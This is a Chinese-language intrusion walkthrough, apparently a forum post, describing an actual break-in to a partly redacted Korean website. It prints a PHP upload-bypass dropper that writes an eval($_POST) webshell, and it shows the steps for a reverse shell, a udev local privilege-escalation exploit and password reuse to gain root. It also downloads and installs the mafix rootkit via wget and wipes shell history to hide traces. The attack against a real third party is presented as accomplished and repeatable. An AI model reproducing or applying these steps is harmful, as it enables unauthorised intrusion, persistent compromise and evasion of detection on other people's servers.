php上传漏洞获root权限

首先用nmap检测一下目标网站的系统服务和一些端口banner的信息。

 

Nmap -v -sT -sV -O -P0 -oX test.xml ***.kr

 

21/tcp   open     ftp            ProFTPD

 

22/tcp   open     ssh            OpenSSH 4.3 (protocol 2.0)

 

25/tcp   open     smtp           Sendmail 8.13.8/8.13.8

 

53/tcp   open     domain         ISC BIND 9.3.4-P1

 

80/tcp   open     http           Apache httpd

 

135/tcp  filtered msrpc

 

136/tcp  filtered profile

 

137/tcp  filtered netbios-ns

 

138/tcp  filtered netbios-dgm

 

139/tcp  filtered netbios-ssn

 

445/tcp  filtered microsoft-ds

 

593/tcp  filtered http-rpc-epmap

 

623/tcp  filtered unknown

 

664/tcp  filtered unknown

 

873/tcp  open     rsync           (protocol version 29)

 

3306/tcp open     mysql          MySQL 4.0.27

 

4444/tcp filtered krb524

 

5000/tcp open     tcpwrapped

 

8080/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1

 

Service Info: Host: ****.com; OS: Unix

 

还有一部分信息我省略了，免得占用太多篇幅，从上面的探测结果来分析，这系统显然不会是windows了，没有太大的直接利用价值，应该不会有弱口令或溢出一类的，虽然棒子比较懒，但这么弱智的还是少，一般会发生在windows的服务器上，下面就该看网站上的信息了。

 

网站是由一套php程序组成的，我对程序鉴别不是很在行，所以也不知道是否开源，是否有漏洞，那么我就先从google搜索关键字allinurl: .php site:***.kr 来搜寻php的页面，把google的链接放到类似于管中窥豹的这类工具中扫描，结果不出所料，一个注入点也扫不到。用web vulnerability scanner 来扫描了解下网站的整体架构。一般看了扫描结果基本对网站的整体框架就会有一定的了解，然后从中搜寻入手点。

 

在主页上我看到有一个登陆界面，我喜欢先找上传方面的问题，有可以同网站交互的地方，就可能存在着隐患，所以我现在注册一个账户并且登陆进去。之后再主页上找到了一个类似论坛或交流版的地方，可以发帖子，发帖功能中可以上传附件，这里就是通向webshell的桥梁，但这个桥并不是那么好过。如图1:

 

图片[attach]12[/attach]

 

 

选择要上传的图片后，自动就传上去了，这个省事，省着我去点上传了，图片上传好后点确定，从编辑窗口中修改编辑格式为text就可以看到上传后的地址 <IMG src="http://***.kr/data/geditor/0907/1008362430_3a017577_logo.gif"> 现在我试着伪造一个gif文件头的php木马来上传。效果如图2

 

图片[attach]13[/attach]

 

上传失败。即使后缀为gif也失败，这个上传功能看来要验证完整的图片才可以。必须要换个方法，现在使用jpginject程序来把php一句话木马注入到jpg文件中，注意这个工具只能把代码注入jpg格式的图片，不支持png以及gif（原理上来说应该可以，只不过工具打不开非jpg格式图片）。使用格式为 edjpgcom.exe 要注入的jpg图片，然后会弹出如图3的窗口：

 

图片[attach]14[/attach]

 

 

 

把代码写入里面，点OK就可以了，现在那个图片中就被注入了php一句话木马。那个挑勾的delete backup选项的意思是问是否删除备份，如果不选择的话会在当前目录生成一个后缀bak的备份文件，这个选还是不选就看自己的需要了。现在把处理过的jpg文件后缀修改为php然后上传。结果如图4

 

[attach]15[/attach]

 

图片

 

依然无效，看来这个工具并不适合在这里利用，可能本地包含漏洞可以试试这个(milw0rm上的录像用的就是这个工具配合本地文件包含)。现在再换一种方法，使用c32asm以16进制显示方式打开这个图片文件，在文件末尾加上php一句话代码（如图5），尽量在php代码前面在加个空格，因为有些时候如果不加空格，"<"符号会与前面的字符发生冲突。现在把插入一句话的jpg文件后缀改成php上传上去。

[attach]16[/attach]

图片 

 

结果如图6

[attach]17[/attach]

 

 

图片

 

上传成功，<IMG src="http://***.kr/data/geditor/0907/1008362430_6e48f460_logo.php"> 我们用一句话客户端访问，可是结果如图7

 

图片[attach]19[/attach]

 

并没有返回我所希望的结果，将图片下载下来后用文本查看，看不到php代码，我还以为上传过程中将恶意代码过滤了，理论上来说那就是执行了，我们上传后的文件是以php解析的，应该是经执行了，后来我将这个文件放到我自己的php环境中测试发现，并没有将我们的代码过滤，那么就是执行了。既然一句话木马达不到我们的目的，我们就再换最后一个方式。依然是使用刚才的图片，用c32asm以16进制格式编辑，在文件末尾处删除掉刚刚的一句话代码，换成下面这段代码：

 

<?fputs(fopen("sunwear.php","w"),"<?eval(\$_POST[sunwear]);?>")?> 保存为php文件上传。这段代码的意思是在当前目录下生成一个名为sunwear.php的文件，内容是我们的一句话木马。上传后访问该地址，在然后我们试试用一句话客户端连接这个地址同目录下的sunwear.php 密码 sunwear 如图8

 

[attach]18[/attach]图片

 

这下终于传上来了。下面的工作就是传大马了，这个就不需要废话了。取得webshell并不是我理想的结果，windows不拿到系统权限不舒服，linux不拿到root感觉还是不舒服(当然有时候只能不舒服)，所以继续踏上提权之旅，为了方便提权，先用webshell反弹回一个命令行的shell在说，c99这类的shell貌似都有反弹shell的功能(有perl版，有C版)。如图9

 

[attach]20[/attach]图片

 

来看下系统相关信息，来确定我们是在什么环境下。

 

cat /proc/version

 

Linux version 2.6.18-128.1.10.el5 (mockbuild@builder16.centos.org) (gcc version

 

4.1.2 20080704 (Red Hat 4.1.2-44)) #1 SMP Thu May 7 10:39:21 EDT 2009

 

cat /etc/redhat-re*

 

CentOS release 5.3 (Final)

 

 

 

uname -a

 

Linux eposang.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:39:21 EDT 2009 i686 i6

 

86 i386 GNU/Linux

 

 

 

内核版本是2.6.18 ，版本很高，目前只能试试新出不久的 udev 本地溢出提权漏洞了，由于返回的shell没权限使用wget,所以直接用webshell来传，创建一个文件名为1 把exp写入进去。Exploit地址http://www.milw0rm.com/exploits/8478 (还有另一个版本的exp 是C版 不过不推荐那个)。然后 chmod +x 1 赋予exp文件执行权限。

 

现在我们需要获取udev 的进程PID。执行下面的命令

 

ps ax|grep udev|grep -v grep|awk {'print $1'}

 

 

 

返回457，而exp参数需要的是进程ID减一，也就是456。执行

 

 

 

./1 456

 

/bin/sh: ./1: /bin/sh^M: bad interpreter: No such file or directory

 

这个是由系统编码所引起的错误，有些系统没事。解决方法：

 

Vi 1

 

:set ff=unix

 

:wq

 

现在OK了，继续。

 

./1 456

 

suid.c: In function 'main':

 

suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'

 

./1: line 131: /tmp/udev: Permission denied

 

/tmp/udev没有执行权限，chmod +x 无用，看来现在我就要对exploit进行修改了，把/tmp/替换为一个拥有权限的目录，比如web目录（注意不要设置与程序同一个目录），再执行看回显：

 

./1 456

 

suid.c: In function 'main':

 

suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'

 

执行上没有出问题，但似乎并没有成功，据baoz总等人讲，有时候需要反复溢出，但我大概溢出了N（N>10）次也没见成功，看来是人品问题。此路不通换一路，我记得2002年还是2003年来着写过一篇渗透国内某linux服务器组的文章，大概意思是管理员的密码通用，所以下面工作就是采集信息了，现在找到网站的数据库连接配置文件。如图10:

 

图片[attach]21[/attach]

 

看到 mysql的用户和密码，可惜不是root ，这个服务器有很多库，用户名是网站的名字，似乎有点虚拟主机的样子，不过还是连接到数据库，将管理员表中的几个密码都记下来，然后一个一个得在ssh上登陆，试了大概10来个密码也没进去，最后用mysql的密码连上了root，貌似是我的大脑短路了，应该先试mysql的密码啊，这种逻辑错误的发生概率在我身上还是比较大的。之后我发现服务器上果然所有密码基本上都是同一个(ftp,ssh,网站等等)。

 

 

 

有了root权限剩下的工作就是留个万恶的rootkit了。前几天opensc.ws上有人放了一个linux 2.6.* 内核的rootkit ，我在自己的服务器上和虚拟机上都测试了一下，还是不错的。我传到EST论坛了，大家可以试试。帖子地址：

https://forum.eviloctal.com/viewthread.php?tid=38136

 

用root登陆ssh，wget下载 (这里下载就不用加https了，另外上面发的是帖子地址下面是附件地址，wget要连接附件的地址。)

 

[root@*** tmp]# wget http://forum.eviloctal.com/attachment.php?aid=13419

 

 

 

…… 省略                                                                                          446,713      275K/s   in 1.6s     /* 速度还挺快 */

 

10:38:45 (275 KB/s) - `mafix.tar.gz' saved [446713]

 

在然后 tar zxvf mafix.tar.gz 解压缩。进入目录，赋予root文件执行权限，如图11

 

图片[attach]22[/attach]

 

格式为./root 连接密码 端口  回车

 

由于这个服务器配置问题bash没有执行权限，我还了个目录执行，如果安装成功结果会如下图12：

 

图片[attach]23[/attach]

 

安装成功后目录会自行删除，最后 history -c 清除我们的命令记录。